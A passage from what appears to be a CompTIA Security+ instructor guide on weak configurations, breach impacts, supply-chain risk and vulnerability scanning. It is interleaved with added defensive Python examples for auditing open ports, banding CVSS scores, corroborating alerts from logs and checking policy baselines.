equivalents (directdefense.com/how-to-prevent-exploitation-of-amazon-s3-buckets-
with-weak-permissions).

ho lide s ea et or Confi urations


Weak Network
Vulnerabilities can also arise from running unnecessary services or using weak
Configurations encryption.

Open Ports and Services
Network applications and services allow client connections via Transmission Control
Protocol (TCP) or User Datagram Protocol (UDP) port numbers. The clients and
servers are identified by Internet Protocol (IP) addresses. Servers must operate
with at least some open ports, but security best practice dictates that these should be
restricted to only necessary services. Running unnecessary open ports and services
increases the attack surface. Some generic steps to harden services to meet a given
role include:
• If the service is security-critical (such as a remote administration interface), restrict
endpoints that are allowed to access the service by IP address or address range.
Alternatively, blacklist suspect endpoints from connecting but otherwise allow
access.

• Disable services that are installed by default but that are not needed. Ideally, disable
the service on the server itself, but in some circumstances it may be necessary to
block the port using a firewall instead.

• For services that should only be available on the private network, block access to
ports at border firewalls or segment the network so that the servers cannot be
accessed from external networks.
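The three hardening steps above can be turned into a repeatable check. This is an added example, not code from the CompTIA guide: it parses a constructed listening-socket table in the style of `ss -Hltnp` output and audits it against a constructed role baseline and firewall source allowlist, flagging services the role does not need, admin interfaces with no source restriction, and private-only services exposed on every interface.

```python
"""Audit listening services against a host's role baseline.

Added example; it is not from the CompTIA guide. The socket table, the role
baseline and the firewall allowlist are all constructed for illustration.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample in the style of `ss -Hltnp`, one listening socket per line:
# state, recv-q, send-q, local address:port, peer address:port, owning process.
SAMPLE_SS_OUTPUT = """\
LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=812,fd=3))
LISTEN 0 511 0.0.0.0:443 0.0.0.0:* users:(("nginx",pid=1201,fd=6))
LISTEN 0 80 0.0.0.0:3306 0.0.0.0:* users:(("mysqld",pid=977,fd=21))
LISTEN 0 128 0.0.0.0:23 0.0.0.0:* users:(("telnetd",pid=1330,fd=4))
LISTEN 0 50 127.0.0.1:6379 0.0.0.0:* users:(("redis-server",pid=1402,fd=6))
LISTEN 0 128 [::]:22 [::]:* users:(("sshd",pid=812,fd=4))
"""


@dataclass(frozen=True)
class Listener:
    addr: str
    port: int
    process: str


@dataclass(frozen=True)
class ServiceRule:
    name: str
    exposure: str  # "public", "restricted" (admin interface, source IPs allowlisted) or "private"


@dataclass(frozen=True)
class Finding:
    port: int
    process: str
    issue: str


# Constructed role baseline for a public web server (assumption, not a published standard).
WEB_SERVER_BASELINE: Dict[int, ServiceRule] = {
    22: ServiceRule("ssh", "restricted"),
    443: ServiceRule("https", "public"),
    3306: ServiceRule("mysql", "private"),
}

WILDCARD_BINDS = {"0.0.0.0", "::", "*"}
LOOPBACK_BINDS = {"127.0.0.1", "::1"}
_PROCESS_RE = re.compile(r'\(\("([^"]+)"')


def parse_listeners(ss_text: str) -> List[Listener]:
    """Turn ss-style LISTEN lines into Listener records (IPv6 brackets stripped)."""
    listeners = []
    for line in ss_text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue
        addr, _, port = fields[3].rpartition(":")
        match = _PROCESS_RE.search(line)
        listeners.append(Listener(addr.strip("[]"), int(port), match.group(1) if match else "unknown"))
    return listeners


def validate_allowlist(allowlist: Dict[int, List[str]]) -> Dict[int, List[str]]:
    """Reject malformed CIDRs so a typo cannot silently disable a restriction."""
    return {port: [str(ipaddress.ip_network(c, strict=False)) for c in cidrs]
            for port, cidrs in allowlist.items()}


def audit_listeners(listeners: List[Listener], baseline: Dict[int, ServiceRule],
                    source_allowlist: Dict[int, List[str]]) -> List[Finding]:
    """Apply the three hardening steps: unneeded services, unrestricted admin
    interfaces, and private services reachable from all interfaces."""
    allowlist = validate_allowlist(source_allowlist)
    findings = []
    for lst in listeners:
        rule = baseline.get(lst.port)
        if rule is None:
            if lst.addr in LOOPBACK_BINDS:
                continue  # reachable only from the host itself, so not part of the network attack surface
            findings.append(Finding(lst.port, lst.process,
                                    "not required by role: disable the service or block the port at the host firewall"))
        elif rule.exposure == "private" and lst.addr in WILDCARD_BINDS:
            findings.append(Finding(lst.port, lst.process,
                                    f"{rule.name} is private-only but listens on all interfaces: "
                                    "bind it to the internal address and block the port at the border firewall"))
        elif rule.exposure == "restricted" and not allowlist.get(lst.port):
            findings.append(Finding(lst.port, lst.process,
                                    f"{rule.name} is security-critical but has no source IP restriction: "
                                    "allow only management addresses"))
    return findings


if __name__ == "__main__":
    for f in audit_listeners(parse_listeners(SAMPLE_SS_OUTPUT), WEB_SERVER_BASELINE, {}):
        print(f"port {f.port}/{f.process}: {f.issue}")
```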

Unsecure Protocols
An unsecure protocol is one that transfers data as cleartext; that is, the protocol does
not use encryption for data protection. Lack of encryption also means that there is
no secure way to authenticate the endpoints. This allows an attacker to intercept and
modify communications, acting as man-in-the-middle (MITM).

Weak Encryption
Encryption algorithms protect data when it is stored on disk or transferred over
a network. Encrypted data should only be accessible to someone with the correct
decryption key. Weak encryption vulnerabilities allow unauthorized access to data.
Such vulnerabilities arise in the following circumstances:
• The key is generated from a simple password, making it vulnerable to guessing
attempts by brute-force enumeration (if the password is too short) or dictionary
enumeration (if the password is not complex).

• The algorithm or cipher used for encryption has known weaknesses that allow
brute-force enumeration.

• The key is not distributed securely and can easily fall into the hands of people who
are not authorized to decrypt the data.

Errors
Weakly configured applications may display unformatted error messages under
certain conditions. These error messages can be revealing to threat actors probing for
vulnerabilities and coding mistakes. Secure coding practices should ensure that if an
application fails, it does so "gracefully" without revealing information that could assist
the development of an exploit.

Show Slide(s): Impacts from Vulnerabilities

Impacts from Vulnerabilities
Vulnerabilities can lead to various data breach and data loss scenarios. These
events can have serious impacts in terms of costs and damage to the organization's
reputation.

Teaching Tip: Ensure students can distinguish breach, exfiltration, and loss and
associate these events with financial and reputational impacts.

Data Breaches and Data Exfiltration Impacts
All information should be collected, stored, and processed by authenticated users and
hosts subject to the permissions (authorization) allocated to them by the data owner.
Data breach and data exfiltration describe two types of event where unauthorized
information use occurs:
• A data breach event is where confidential data is read or transferred without
authorization. A privacy breach is where personal data is not collected, stored,
or processed in full compliance with the laws or regulations governing personal
information. A breach can also be described as a data leak. A data breach can be
intentional/malicious or unintentional/accidental.

• Data exfiltration is the methods and tools by which an attacker transfers data
without authorization from the victim's systems to an external network or media.
Unlike a data breach, a data exfiltration event is always intentional and malicious. A
data breach is a consequence of a data exfiltration event.

Data breach includes a wide range of scenarios with different levels of impact. The
most severe data breaches compromise valuable intellectual property (IP) or the
personal information of account holders.

Identity Theft Impacts
A privacy breach may allow the threat actor to perform identity theft or to sell the data
to other malicious actors. The threat actor may obtain account credentials or might
be able to use personal details and financial information to make fraudulent credit
applications and purchases.

Data Loss and Availability Loss Impacts
Compared to data breaches, data loss is where information becomes unavailable,
either permanently or temporarily. Availability is sometimes overlooked as a security
attribute compared to confidentiality and integrity, but it can have severe impacts on
business workflows. If processing systems are brought down by accidental or malicious
disaster events, a company may not be able to perform crucial workflows like order
processing and fulfillment.

Financial and Reputation Impacts
All these impacts can have direct financial impacts due to damages, fines, and loss of
business. Data/privacy breach and availability loss events will also cause a company's
reputation to drop with direct customers. Major events might cause widespread
adverse publicity on social media and mainstream media. In anticipation of these
impacts, incident handling teams should include public relations (PR) and marketing
expertise to minimize reputational damage.

Show Slide(s): Third-Party Risks

Third-Party Risks
High-profile breaches have led to a greater appreciation of the importance of the
supply chain in vulnerability management. A product, or even a service, may have
components created and maintained by a long chain of different companies. Each
company in the chain depends on its suppliers or vendors performing due diligence on
their vendors. A weak link in the chain could cause impacts on service availability and
performance, or in the worst cases lead to data breaches.

Teaching Tip: Supply chain risks have been expanded in the current syllabus version,
so make sure students are focused on it.

Vendor Management
Vendor management is a process for selecting supplier companies and evaluating
the risks inherent in relying on a third-party product or service. When it comes to data
and cybersecurity, you must understand that risks cannot be wholly transferred to the
vendor. If a data storage vendor suffers a data breach, you may be able to claim costs
from them, but your company will still be held liable in terms of legal penalties and
damage to reputation. If your webstore suffers frequent outages because of failures at
a hosting provider, it is your company's reputation that will suffer and your company
that will lose orders because customers look elsewhere.
A vendor may supply documentation and certification to prove that it has implemented
a security policy robustly. You might be able to see evidence of security capabilities,
such as a history of effective vulnerability management and product support. Larger
companies will usually ask vendors to complete a detailed audit process to ensure that
they meet the required standards.
Within vendor management, system integration refers to the process of using
components/services from multiple vendors to implement a business workflow. For
example, a workflow allowing customers to make online purchases might involve the
storefront product, a web application firewall, cloud data processing and analytics,
plus integration with on-premises accounting and customer relationship management
(CRM) and support ticketing systems. The contracting company may have a list of
preferred vendors and ask a third-party systems integrator to build and support the
solution. Alternatively, systems integration might be fully outsourced, with the third-
party integrator also selecting their preferred vendors for the component parts. The
principal risk in both these scenarios is that the contracting company does not have
sufficient expertise to oversee the project and places too much trust in the third-party
integrator.
When a vendor has become deeply embedded within a workflow, lack of vendor
support can have serious impacts, as retooling the workflow to use a different vendor
can be a long and complex process. Vendors may become unsupportive for any
number of reasons. For example, their company might be growing too quickly and
resources are spread too thinly, they may drop support for products that are not
profitable, they may have overstated capabilities in terms of security, and so on. The
key point for vendor management is to assess these risks when determining whether
to outsource all or part of a workflow and to have contingency plans if a vendor does
not perform as expected.


Outsourced Code Development
The problem of effective oversight is particularly pertinent to outsourced code
development. Many companies do not have in-house programming expertise, but
without such expertise it is hard to ensure that contractors are delivering secure
code. A solution is to use one vendor for development and a different vendor for
vulnerability and penetration testing.

Data Storage
There are two main scenarios for risks to data when using third parties. First, you may
need to grant vendor access to your data, and second, you may use a vendor to host
data or data backups and archives. The following general precautions should be taken:
• Ensure the same protections for data as though it were stored on-premises,
including authorization and access management and encryption.

• Monitor and audit third-party access to data storage to ensure it is being used only
in compliance with data sharing agreements and non-disclosure agreements.

• Evaluate compliance impacts from storing personal data on a third-party system,
such as a cloud provider or backup/archive management service.

Cloud-Based versus On-Premises Risks
On-premises risks refer to software vulnerabilities, weak configurations, and third-party
issues arising from hosts, servers, routers, switches, access points, and firewalls located
on a private network installed to private offices or campus buildings. Many companies
use cloud services to fully or partly support business workflows. The third-party vendor
management, code, and data storage risks discussed previously apply directly to
cloud as well as to on-premises. Software and weak configuration risks can also apply,
however. They are not the sole responsibility of the cloud service provider (CSP). Clouds
operate a shared responsibility model. This means that the cloud service provider is
responsible for the security of the cloud, while the cloud consumer is responsible for
security in the cloud. The types of software and configuration vulnerabilities that you
must assess and monitor vary according to the nature of the service.


Review Activity:
Security Concerns with General
Vulnerability Types
Answer the following questions:

1. You are recommending that a business owner invest in patch management
controls for PCs and laptops. What is the main risk from weak patch
management procedures on such devices?
Vulnerabilities in the OS and applications software such as web browsers and
document readers or in PC and adapter firmware can allow threat actors to run
malware and gain a foothold on the network.
2. You are advising a business owner on security for a PC running Windows XP.
The PC runs process management software that the owner cannot run
on Windows 10. What are the risks arising from this and how can they be
mitigated?
Windows XP is a legacy platform that is no longer receiving security updates. This
means that patch management cannot be used to reduce risks from software
vulnerabilities. The workstation should be isolated from other systems to reduce the
risk of compromise.
3. As a security solutions provider, you are compiling a checklist for your
customers to assess potential weak configuration vulnerabilities based on
the CompTIA Security+ syllabus. From the headings you have added so far,
which is missing and what vulnerability does it relate to? Default settings,
Unsecured root accounts, Open ports and services, Unsecure protocols,
Weak encryption, Errors.
Open permissions refers to misconfigured access rights for data folders, network file
shares, and cloud storage.
4. You are advising a customer on backup and disaster recovery solutions. The
customer is confused between data breaches and data loss and whether the
backup solution will protect against both. What explanation can you give?
Backup solutions mitigate risks from data loss, where files or information is deleted,
corrupted, or otherwise destroyed. Backup does not mitigate risks from data breach,
where confidential or private data is stolen (exfiltrated) and made public or sold for
criminal profit. Mitigating risks of data breach requires effective secure processing,
authorization, and authentication security controls.
5. A system integrator is offering a turnkey solution for customer contact
data storage and engagement analytics using several cloud services. Does
this solution present any supply chain risks beyond those of the system
integrator's consulting company?
Yes, the system integrator is proposing the use of multiple vendors (the cloud service
providers), with potentially complex issues for collecting, storing, and sharing customer
personal data across these vendors. Each company in the supply chain should be
assessed for risk and compliance with cybersecurity and privacy standards.


Topic 3C
Summarize Vulnerability
Scanning Techniques

EXAM OBJECTIVES COVERED
1.7 Summarize the techniques used in security assessments

Teaching Tip: This topic covers the first part of objective 1.7. The content examples
for Syslog/SIEM are in topic 10C. While this is not an implement-level objective, there
is a fair amount of configuration detail in the content examples.

Automated vulnerability scanning is a key part of both initial security assessment and
ongoing compliance monitoring. You should be able to summarize types of scanners
and explain the impact of scan configurations. You should also be able to contribute to
threat hunting security assessments and explain how they can be supported by threat
intelligence platforms.

Show Slide(s): Security Assessments

Security Assessments
Network reconnaissance and discovery is used to identify hosts, network topology,
and open services/ports, establishing an overall attack surface. Various types of
security assessments can be used to test these hosts and services for vulnerabilities.
There are many models and frameworks for conducting security assessments. A good
starting point is NIST's Technical Guide to Information Security Testing and Assessment
(nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-115.pdf). SP 800-115
identifies three principal activities within an assessment:
• Testing the object under assessment to discover vulnerabilities or to prove the
effectiveness of security controls.

• Examining assessment objects to understand the security system and identify any
logical weaknesses. This might highlight a lack of security controls or a common
misconfiguration.

• Interviewing personnel to gather information and probe attitudes toward and
understanding of security.

Teaching Tip: Relate vulnerability scanning to other types of security assessment.
Note that most types of vulnerability assessment can be performed using automated
tools.

The main types of security assessment are usually classed as vulnerability
assessment, threat hunting, and penetration testing. A vulnerability assessment is an
evaluation of a system's security and ability to meet compliance requirements based
on the configuration state of the system. Essentially, the vulnerability assessment
determines if the current configuration matches the ideal configuration (the baseline).
Vulnerability assessments might involve manual inspection of security controls, but are
more often accomplished through automated vulnerability scanners.

Show Slide(s): Vulnerability Scan Types

Vulnerability Scan Types
An automated scanner must be configured with signatures and scripts that can
correlate known software and configuration vulnerabilities with data gathered from
each host. Consequently, there are several types of vulnerability scanners optimized
for different tasks.


Network Vulnerability Scanner
A network vulnerability scanner, such as Tenable Nessus (tenable.com/products/
nessus) or OpenVAS (openvas.org), is designed to test network hosts, including client
PCs, mobile devices, servers, routers, and switches. It examines an organization's
on-premises systems, applications, and devices and compares the scan results to
configuration templates plus lists of known vulnerabilities. Typical results from a
vulnerability assessment will identify missing patches, deviations from baseline
configuration templates, and other related vulnerabilities.

Greenbone OpenVAS vulnerability scanner with Security Assistant web application interface as installed
on Kali Linux. (Screenshot used with permission from Greenbone Networks, http://www.openvas.org.)

The first phase of scanning might be to run a detection scan to discover hosts on a
particular IP subnet. In the next phase of scanning, a target range of hosts is probed
to detect running services, patch level, security configuration and policies, network
shares, unused accounts, weak passwords, anti-virus configuration, and so on.
Each scanner is configured with a database of known software and configuration
vulnerabilities. The tool compiles a report about each vulnerability in its database that
was found to be present on each host. Each identified vulnerability is categorized and
assigned an impact warning. Most tools also suggest remediation techniques. This
information is highly sensitive, so use of these tools and the distribution of the reports
produced should be restricted to authorized hosts and user accounts.
Network vulnerability scanners are configured with information about known
vulnerabilities and configuration weaknesses for typical network hosts. These scanners
will be able to test common operating systems, desktop applications, and some
server applications. This is useful for general purpose scanning, but some types of
applications might need more rigorous analysis.


Application and Web Application Scanners
A dedicated application scanner is configured with more detailed and specific
scripts to test for known attacks, as well as scanning for missing patches and weak
configurations. The best known class of application scanners are web application
scanners. Tools such as Nikto (cirt.net/Nikto2) look for known web exploits, such as SQL
injection and cross-site scripting (XSS), and may also analyze source code and database
security to detect unsecure programming practices. Other types of application scanner
would be optimized for a particular class of software, such as a database server.

Show Slide(s): Common Vulnerabilities and Exposures

Common Vulnerabilities and Exposures
An automated scanner needs to be kept up to date with information about known
vulnerabilities. This information is often described as a vulnerability feed, though the
Nessus tool refers to these feeds as plug-ins, and OpenVAS refers to them as network
vulnerability tests (NVTs). Often, the vulnerability feed forms an important part of scan
vendors' commercial models, as the latest updates require a valid subscription to
acquire.

Checking feed status in the Greenbone Community Edition vulnerability manager.
(Screenshot: Greenbone Community Edition, greenbone.net/en/community-edition.)

Vulnerability feeds make use of common identifiers to facilitate sharing of intelligence
data across different platforms. Many vulnerability scanners use the Security Content
Automation Protocol (SCAP) to obtain feed or plug-in updates (scap.nist.gov). As well
as providing a mechanism for distributing the feed, SCAP defines ways to compare the
actual configuration of a system to a target secure baseline plus various systems of
common identifiers. These identifiers supply a standard means for different products
to refer to a vulnerability or platform consistently.
Common Vulnerabilities and Exposures (CVE) is a dictionary of vulnerabilities in
published operating systems and applications software (cve.mitre.org). There are
several elements that make up a vulnerability's entry in the CVE:
• An identifier in the format CVE-YYYY-NNNN, where YYYY is the year the vulnerability
was discovered, and NNNN is at least four digits that indicate the order in which the
vulnerability was discovered.

• A brief description of the vulnerability.

• A reference list of URLs that supply more information on the vulnerability.

• The date the vulnerability entry was created.

The CVE dictionary provides the principal input for NIST's National Vulnerability
Database (nvd.nist.gov). The NVD supplements the CVE descriptions with additional
analysis, a criticality metric, calculated using the Common Vulnerability Scoring
System (CVSS), plus fix information.


CVSS is maintained by the Forum of Incident Response and Security Teams
(first.org/cvss). CVSS metrics generate a score from 0 to 10 based on characteristics
of the vulnerability, such as whether it can be triggered remotely or needs local
access, whether user intervention is required, and so on. The scores are banded into
descriptions too:

Score   Description
0.1+    Low
4.0+    Medium
7.0+    High
9.0+    Critical
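The identifier format and the score bands above are exactly the kind of thing a scanner report consumer has to validate. This is an added example, not code from the CompTIA guide, NVD or any scanner: it checks the CVE-YYYY-NNNN format, bands a CVSS score per the table, and summarizes a constructed list of scan findings by host and band. The CVE numbers in the sample are placeholders, not real entries, and the 0.0 score is labelled "None", the CVSS specification's own term for a zero score, which the table above does not list.

```python
"""Validate CVE identifiers and band CVSS base scores.

Added example; not from the CompTIA guide or from NVD tooling. The findings
list and its CVE identifiers are constructed placeholders.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Year, then a sequence number of at least four digits (more are allowed).
_CVE_ID_RE = re.compile(r"^CVE-(\d{4})-(\d{4,})$")

# Lower bound of each band from the guide's table, highest first.
CVSS_BANDS: List[Tuple[float, str]] = [(9.0, "Critical"), (7.0, "High"), (4.0, "Medium"), (0.1, "Low")]


def parse_cve_id(cve_id: str) -> Optional[Tuple[int, int]]:
    """Return (year, sequence) for a well-formed identifier, else None."""
    match = _CVE_ID_RE.match(cve_id.strip().upper())
    if not match:
        return None
    return int(match.group(1)), int(match.group(2))


def cvss_band(score: float) -> str:
    """Map a 0.0-10.0 score to its band; 0.0 is "None" (the CVSS specification's label)."""
    if not 0.0 <= score <= 10.0:
        raise ValueError(f"CVSS score out of range: {score}")
    for floor, label in CVSS_BANDS:
        if score >= floor:
            return label
    return "None"


# Constructed findings in the shape a scanner report exports: host, CVE id, CVSS score.
SAMPLE_FINDINGS = [
    ("web01", "CVE-2099-10001", 9.8),   # placeholder identifiers, not real CVEs
    ("web01", "CVE-2099-10002", 5.3),
    ("web01", "cve-2099-10003", 7.5),   # lower-case ids are normalized
    ("db01", "CVE-2099-00042", 4.0),    # exactly on the Medium boundary
    ("db01", "CVE-2099-999", 6.1),      # malformed: fewer than four digits
    ("db01", "CVE-2099-10004", 0.0),
]


def summarize_findings(findings):
    """Count findings per host and band; malformed ids are reported, not dropped silently."""
    counts: Dict[str, Dict[str, int]] = defaultdict(lambda: defaultdict(int))
    rejected = []
    for host, cve_id, score in findings:
        if parse_cve_id(cve_id) is None:
            rejected.append((host, cve_id))
            continue
        counts[host][cvss_band(score)] += 1
    return {host: dict(bands) for host, bands in counts.items()}, rejected


def most_critical(findings, limit: int = 3):
    """Highest-scoring well-formed findings first: the 'most critical across all hosts' view."""
    valid = [f for f in findings if parse_cve_id(f[1]) is not None]
    return sorted(valid, key=lambda f: f[2], reverse=True)[:limit]


if __name__ == "__main__":
    by_host, bad = summarize_findings(SAMPLE_FINDINGS)
    for host, bands in by_host.items():
        print(host, bands)
    print("rejected identifiers:", bad)
    print("top findings:", most_critical(SAMPLE_FINDINGS))
```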

Show Slide(s): Intrusive versus Non-Intrusive Scanning

Intrusive versus Non-Intrusive Scanning
A network vulnerability scanner can be implemented purely as software or as a security
appliance, connected to the network. Some scanners work remotely by contacting
the target host over the network. Other scanner types use agents installed locally on
each host to perform the scanning and transmit a report to a management server. For
example, Nessus Professional allows remote scanning of hosts while Nessus Manager
and Tenable Cloud can work with locally installed agent software.

Teaching Tip: Ensure students can distinguish these scanning techniques and identify
drawbacks, such as time to complete, inaccurate results, and risk of system crash.

Nessus Manager web management interface.
(Screenshot used with permission from Tenable Network Security.)

Scan intrusiveness is a measure of how much the scanner interacts with the target.
Non-intrusive (or passive) scanning means analyzing indirect evidence, such as the
types of traffic generated by a device. A passive scanner, the Zeek Network Security
Monitor (zeek.org) being one example, analyzes a network capture and tries to identify
policy deviations or CVE matches. This type of scanning has the least impact on the
network and on hosts, but is less likely to identify vulnerabilities comprehensively.
Passive scanning might be used by a threat actor to scan a network stealthily. You might
use passive scanning as a technique where active scanning poses a serious risk to system
stability, such as scanning print devices, VoIP handsets, or embedded systems networks.
Active scanning means probing the device's configuration using some sort of network
connection with the target. Active scanning consumes more network bandwidth and
runs the risk of crashing the target of the scan or causing some other sort of outage.
Agent-based scanning is also an active technique.
The most intrusive type of vulnerability scanner does not stop at detecting a
vulnerability. Exploitation frameworks contain default scripts to try to use a
vulnerability to run code or otherwise gain access to the system. This type of highly
intrusive testing is more typical of penetration testing than automated vulnerability
scanning.


Show Slide(s): Credentialed versus Non-Credentialed Scanning

Credentialed versus Non-Credentialed Scanning
A non-credentialed scan is one that proceeds by directing test packets at a host
without being able to log on to the OS or application. The view obtained is the one
that the host exposes to an unprivileged user on the network. The test routines may
be able to include things such as using default passwords for service accounts and
device management interfaces, but they are not given privileged access. While you
may discover more weaknesses with a credentialed scan, you sometimes will want
to narrow your focus to think like an attacker who doesn't have specific high level
permissions or total administrative access. Non-credentialed scanning is often the
most appropriate technique for external assessment of the network perimeter or
when performing web application scanning.
A credentialed scan is given a user account with log-on rights to various hosts,
plus whatever other permissions are appropriate for the testing routines. This
sort of test allows much more in-depth analysis, especially in detecting when
applications or security settings may be misconfigured. It also shows what an
insider attack, or one where the attacker has compromised a user account, may
be able to achieve. A credentialed scan is a more intrusive type of scan than
non-credentialed scanning.

Configuring credentials for use in target (scope) definitions in Greenbone OpenVAS as installed on Kali
Linux. (Screenshot used with permission from Greenbone Networks, http://www.openvas.org.)

Create dedicated network accounts for use by the vulnerability scanner only. Ensure that the
credentials for these accounts are stored securely on the scan server.
Show Slide(s): False Positives, False Negatives, and Log Review

False Positives, False Negatives, and Log Review
A scanning tool will generate a summary report of all vulnerabilities discovered during
the scan directly after execution completes. These reports color-code vulnerabilities
in terms of their criticality, with red typically denoting a weakness that requires
immediate attention. You can usually view vulnerabilities by scope (most critical across
all hosts) or by host. The report should include or link to specific details about each
vulnerability and how hosts can be remediated.

Teaching Tip: Students need to know the meanings of false positive and false negative.


Scan report listing multiple high-severity vulnerabilities found in a Windows host. (Screenshot:
Greenbone Community Edition, greenbone.net/en/community-edition.)

Intrusive/active scanning is more likely to detect a wider range of vulnerabilities in host
systems and can reduce false positives. A false positive is something that is identified
by a scanner or other assessment tool as being a vulnerability, when in fact it is not.
For example, assume that a vulnerability scan identifies an open port on the firewall.
Because a certain brand of malware has been known to use this port, the tool labels
this as a security risk, and recommends that you close the port. However, the port is
not open on your system. Researching the issue costs time and effort, and if excessive
false positives are thrown by a vulnerability scan, it is easy to disregard the scans
entirely, which could lead to larger problems.
You should also be alert to the possibility of false negatives–that is, potential
vulnerabilities that are not identified in a scan. This risk can be mitigated somewhat by
running repeat scans periodically and by using scanners from more than one vendor.
Also, because automated scan plug-ins depend on pre-compiled scripts, they do not
reproduce the success that a skilled and determined hacker might be capable of and
can therefore create a false sense of security.
Reviewing related system and network logs can enhance the vulnerability report
validation process. As an example, assume that your vulnerability scanner identified a
running process on a Windows machine. According to the scanner, the application that
creates this process is known to be unstable, causing the operating system to lock up
and crash other processes and services. When you search the computer's event logs,
you notice several entries over the past couple of weeks indicate the process has failed.
Additional entries show that a few other processes fail right after. In this instance,
you've used a relevant data source to help confirm that the vulnerability alert is, in
fact, valid.
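The log review just described can be scripted so the same validation is applied to every alert of this kind. This is an added example, not code from the CompTIA guide: it searches a constructed event log export (in the style of Windows Application Error events, Event ID 1000) for crashes of the process the scanner flagged during the past two weeks and for other failures shortly after each crash. The process name, the 14-day lookback and the 10-minute follow-on window are assumptions.

```python
"""Corroborate a scanner's 'unstable process' alert against host event logs.

Added example; it is not from the CompTIA guide. The log lines are constructed
in the style of Windows Application Error events and are not real records.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional

# Constructed export: timestamp | level | event id | message
SAMPLE_EVENT_LOG = """\
2021-07-01 09:00:00|Error|1000|Faulting application name: invctl.exe, version: 3.0.9.0
2021-08-10 08:02:11|Error|1000|Faulting application name: invctl.exe, version: 3.1.0.0
2021-08-10 08:03:40|Error|1000|Faulting application name: spoolsv.exe, version: 10.0.19041.1
2021-08-14 13:45:02|Information|1001|Fault bucket 1234, type 4
2021-08-19 17:20:55|Error|1000|Faulting application name: invctl.exe, version: 3.1.0.0
2021-08-19 17:22:10|Error|1000|Faulting application name: svchost.exe, version: 10.0.19041.1
2021-08-19 17:26:31|Error|7031|The Print Spooler service terminated unexpectedly.
"""
# When the (constructed) scanner alert was raised.
SAMPLE_ALERT_TIME = datetime(2021, 8, 24)


@dataclass(frozen=True)
class Event:
    when: datetime
    level: str
    event_id: int
    message: str

    @property
    def faulting_process(self) -> Optional[str]:
        match = re.search(r"Faulting application name: ([^,]+)", self.message)
        return match.group(1) if match else None


def parse_events(text: str) -> List[Event]:
    """Parse the pipe-delimited export into Event records, oldest first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, level, event_id, message = line.split("|", 3)
        events.append(Event(datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S"), level, int(event_id), message))
    return sorted(events, key=lambda e: e.when)


@dataclass
class Corroboration:
    process: str
    crashes: List[datetime]
    follow_on_failures: List[Event]

    @property
    def corroborated(self) -> bool:
        # Repeated crashes plus knock-on failures match what the scanner claims.
        return len(self.crashes) >= 2 and bool(self.follow_on_failures)


def corroborate_alert(events: List[Event], process: str, alert_time: datetime,
                      lookback_days: int = 14, window_minutes: int = 10) -> Corroboration:
    """Find crashes of `process` in the lookback period and any other Error-level
    events within `window_minutes` after each crash."""
    start = alert_time - timedelta(days=lookback_days)
    crashes = [e for e in events if e.faulting_process == process and start <= e.when <= alert_time]
    follow_on: List[Event] = []
    for crash in crashes:
        window_end = crash.when + timedelta(minutes=window_minutes)
        for e in events:
            if (crash.when < e.when <= window_end and e.level == "Error"
                    and e.faulting_process != process and e not in follow_on):
                follow_on.append(e)
    return Corroboration(process, [c.when for c in crashes], follow_on)


if __name__ == "__main__":
    result = corroborate_alert(parse_events(SAMPLE_EVENT_LOG), "invctl.exe", SAMPLE_ALERT_TIME)
    print(f"{result.process}: {len(result.crashes)} crash(es), "
          f"{len(result.follow_on_failures)} follow-on failure(s), corroborated={result.corroborated}")
```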


Show Slide(s): Configuration Review

Configuration Review
As well as matching known software exploits to the versions of software found running
on a network, a vulnerability scan assesses the configuration of security controls and
application settings and permissions compared to established benchmarks. It might
try to identify whether there is a lack of controls that might be considered necessary or
whether there is any misconfiguration of the system that would make the controls less
effective or ineffective, such as anti-virus software not being updated, or management
passwords left configured to the default. Generally speaking, this sort of testing
requires a credentialed scan. It also requires specific information about best practices
in configuring the particular application or security control. These are provided by
listing the controls and appropriate configuration settings in a template.
Security Content Automation Protocol (SCAP) allows compatible scanners to determine
whether a computer meets a configuration baseline. SCAP uses several components to
accomplish this function, but some of the most important are:
• Open Vulnerability and Assessment Language (OVAL)—an XML schema for
describing system security state and querying vulnerability reports and information.

• Extensible Configuration Checklist Description Format (XCCDF)—an XML schema for
developing and auditing best-practice configuration checklists and rules. Previously,
best-practice guides might have been written in prose for system administrators to
apply manually. XCCDF provides a machine-readable format that can be applied and
validated using compatible software.

Comparing a local network security policy to a template. The minimum password length set
in the local policy is much less than is recommended in the template.
(Screenshot used with permission from Microsoft.)

Some scanners measure systems and configuration settings against best practice
frameworks. This is referred to as a compliance scan. This might be necessary for
regulatory compliance or you might voluntarily want to conform to externally agreed
standards of best practice.
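The template comparison in the screenshot above (local policy versus recommended setting) can be reproduced in a few dozen lines. This is an added example, not code from the CompTIA guide and not an XCCDF or OVAL implementation: it parses a constructed excerpt in the INI style that `secedit /export` produces and checks it against a constructed template of minimum settings, reporting PASS, FAIL or NOT CONFIGURED for each rule. The template values are illustrative assumptions, not a published benchmark.

```python
"""Compare an exported local security policy to a template baseline.

Added example; it is not from the CompTIA guide. Both the policy excerpt and
the template are constructed for illustration.
"""
import configparser
import operator
from dataclasses import dataclass
from typing import List, Optional

# Constructed local policy export (secedit-style sections and keys).
SAMPLE_LOCAL_POLICY = """\
[Unicode]
Unicode=yes
[System Access]
MinimumPasswordLength = 6
PasswordComplexity = 0
MaximumPasswordAge = 90
LockoutBadCount = 0
[Event Audit]
AuditLogonEvents = 3
"""

_OPS = {">=": operator.ge, "<=": operator.le, "==": operator.eq}


@dataclass(frozen=True)
class Rule:
    section: str
    key: str
    op: str
    expected: int
    rationale: str


# Constructed template; the numbers are illustrative, not a specific benchmark.
SAMPLE_TEMPLATE: List[Rule] = [
    Rule("System Access", "MinimumPasswordLength", ">=", 14, "short passwords fall to brute-force guessing"),
    Rule("System Access", "PasswordComplexity", "==", 1, "simple passwords fall to dictionary guessing"),
    Rule("System Access", "MaximumPasswordAge", "<=", 90, "limit the lifetime of a compromised password"),
    Rule("System Access", "MinimumPasswordAge", ">=", 1, "stop users cycling straight back to an old password"),
    Rule("System Access", "LockoutBadCount", ">=", 1, "0 disables lockout, allowing unlimited online guessing"),
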